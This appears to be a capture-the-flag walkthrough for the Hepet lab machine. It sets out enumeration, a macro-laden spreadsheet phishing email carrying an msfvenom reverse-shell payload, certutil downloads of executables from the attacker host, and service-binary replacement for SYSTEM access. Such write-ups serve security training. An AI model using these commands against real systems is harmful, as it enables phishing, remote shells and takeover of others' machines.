arsalandywriter.com

Proving Grounds Practice - Hepet Walkthrough Guide

Written on

Machine Name: Hepet Machine Type: Windows Difficulty: Intermediate Machine IP: 192.168.244.140 Local Kali IP: 192.168.45.241

Enumeration

Nmap Results autorecon 192.168.244.140

Port 79 ~/Desktop/tools/finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.244.140 | grep -v 'is not known'

Port 8000 Found several usernames.

This confirms the data from finger on port 79. Add these to user.txt. nano user.txt

# admin

# agnes

# charlotte

# jonas

# magnus

# martha

# ela

Check the web content. curl -s http://192.168.244.140:8000/ | html2markdown

This appears to be a password. Credentials: jonas:SicMundusCreatusEst

Port 143 Let's examine the emails. nc 192.168.244.140 143

tag login jonas@localhost SicMundusCreatusEst

tag LIST "" "*"

tag SELECT INBOX

tag STATUS INBOX (MESSAGES)

tag fetch 1 (BODY[1])

tag fetch 2:5 BODY[HEADER] BODY[1]

We find that the mailadmin@localhost account is managing spreadsheets. The software used is likely LibreOffice, suggesting it will accept .ods or .xls files, presenting a potential vector for a macro attack.

Create a macro payload. msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=4444 -f hta-psh -o evil.hta

Open the evil.hta file and split the payload. nano splitter.py

s = "powershell.exe -nop -w hidden -e <payload>"

n = 50

for i in range(0, len(s), n):

chunk = s[i:i + n]

print('Str = Str + "' + chunk + '"')

Create a new .ods file in LibreOffice Calc.

Enable auto-run once the spreadsheet is opened: Tools ? Customize.

Send the file via email. sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s 192.168.244.140:25 -u 'a spreadsheet' -m 'Please check this spreadsheet' -a exploit.ods

nc -nvlp 4444

After a prolonged wait, someone eventually clicked on the file.

Privilege Escalation

Establish persistent access for future enumeration. cd C:xampphtdocs certutil -urlcache -split -f http://192.168.45.192/rev.exe certutil -urlcache -split -f http://192.168.45.192/shell.pHp

Upload WinPEAS and execute. certutil -urlcache -split -f http://192.168.45.192/wps.exe

Some relevant information is gathered.

This process looks suspicious!

It resides in the user's Veyon directory. Let's investigate further. sc qc VeyonService

It operates with system privileges.

Let's substitute the file in this directory with a reverse shell: C:UsersEla ArwelVeyonveyon-service.exe. # on kali msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.192 LPORT=5555 -f exe -o veyon-service.exe nc -nvlp 5555 # on victim Windows cd C:UsersEla ArwelVeyon move veyon-service.exe veyon-service.bak certutil -f -urlcache http://192.168.45.192:80/veyon-service.exe veyon-service.exe shutdown /r

We have now gained admin access! Mission Accomplished!

Share the page:

Twitter Facebook Reddit LinkIn

-----------------------

Recent Post:

Embrace Your Passion: 10 Things to Stop for a Fulfilling Life

Discover ten key actions to let go of for a more fulfilling life and career.

Boost Your Emotional Intelligence: Five Simple Exercises

Discover five practical exercises to enhance your emotional intelligence and improve your relationships and self-awareness.

Unleashing ControlNet: Revolutionizing AI Video Creation

Discover how ControlNet is transforming AI-generated videos, enhancing quality and consistency in creative workflows.

# Empowering Future Generations: The Role of Role Models in Growth

Explore how role models shape student success and ways parents and educators can enhance their mentorship.

# Transformative Insights from Top Psychologists for Personal Growth

Discover valuable self-improvement insights from leading psychologists that can guide you toward personal growth and fulfillment.

Unlocking the Secrets to Better Sleep: A Comprehensive Guide

Discover common sleep disorders and effective strategies to enhance your sleep quality.

A Pre-Antibiotic World Is Not an Option: Lessons from the Past

Examining the rise of antibiotic resistance and its implications for future health crises.

The New Age of Thought: Combining Human Insight with AI

Explore how collective intelligence and AI are transforming our thinking and decision-making processes in the modern world.